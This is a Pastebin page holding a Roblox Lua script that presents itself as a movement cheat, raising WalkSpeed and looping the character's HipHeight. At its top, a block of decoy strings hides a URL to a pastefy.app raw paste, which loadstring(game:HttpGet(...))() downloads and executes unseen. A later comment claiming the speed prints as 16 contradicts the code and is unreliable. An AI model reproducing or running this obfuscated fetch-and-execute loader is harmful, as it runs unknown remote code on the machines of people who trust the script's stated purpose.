Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local r,d,h,g,s,u,c,t,n,q,x,z,a,p,w,f,m,v,e,b,o,j,i,y,k,l,b,ln,com=
- game,"Pastefy","bwTjFg4P","7wTjFg4P","kTjGhS9L","d2RcPf6T",
- "7nWrEg5Q","p9JhTd4B","r8CjQf3N","s2CkRd6W","v5PhZg8L",
- "3sQjRf5T","NpDhqikw","o7KjXg4L","t9GnQd1R","y6LmSf2N",
- "x3QjDg6P","c4VmLb8N","z2PkTf5J","e8LcGh9E","k5RfPd2W",
- "2qFdRg7M","i2QbLh8S","g6ScTd3N","w9LbRf5G","b4NjDc7M","f","y",".app/"
- local u = "https://paste"..b..""..ln..""..com
- loadstring(r:HttpGet(u .. a .. "/raw", true))()
- game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 50
- print(game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed) -- Output: 16
- local player = game.Players.LocalPlayer
- local character = player.Character or player.CharacterAdded:Wait()
- local humanoid = character:WaitForChild("Humanoid")
- local originalHipHeight = humanoid.HipHeight
- local minHipHeight = originalHipHeight - 0.5 -- Modify to value
- local maxHipHeight = originalHipHeight + 3.0 -- Modify value
- while true do
- for i = minHipHeight, maxHipHeight, 0.80 do -- Modify to value
- humanoid.HipHeight = i
- wait()
- end
- for i = maxHipHeight, minHipHeight, -0.80 do -- Modify to value
- humanoid.HipHeight = i
- wait()
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment